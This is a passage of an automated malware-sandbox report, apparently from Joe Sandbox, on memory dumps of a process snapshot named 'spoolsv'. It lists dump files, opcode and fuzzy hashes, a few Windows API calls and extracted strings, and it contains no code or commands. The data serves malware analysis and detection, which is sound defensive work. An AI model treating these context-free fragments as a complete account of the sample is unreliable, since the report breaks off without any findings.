                                                • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: PR$ SE$4$W
                                                • API String ID: 0-2834725127
                                                • Opcode ID: c869601e843fd4a9053239925d837b04ac79045f6dc017caac2b4b0226e989b1
                                                • Instruction ID: de84d66766f4911dbb4cb6dd5687d3048455578843a01c8ac6cd267dfc716551
                                                • Opcode Fuzzy Hash: c869601e843fd4a9053239925d837b04ac79045f6dc017caac2b4b0226e989b1
                                                • Instruction Fuzzy Hash: C0F1FAB1901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: RO$C$Once$Start
                                                • API String ID: 0-2962527757
                                                • Opcode ID: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                • Opcode Fuzzy Hash: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                APIs
                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DateFormatLocaleThread
                                                • String ID: yyyy
                                                • API String ID: 3303714858-3145165042
                                                • Opcode ID: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                • Opcode Fuzzy Hash: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                APIs
                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DateFormatLocaleThread
                                                • String ID: yyyy
                                                • API String ID: 3303714858-3145165042
                                                • Opcode ID: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                • Opcode Fuzzy Hash: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                • API String ID: 0-1311169778
                                                • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4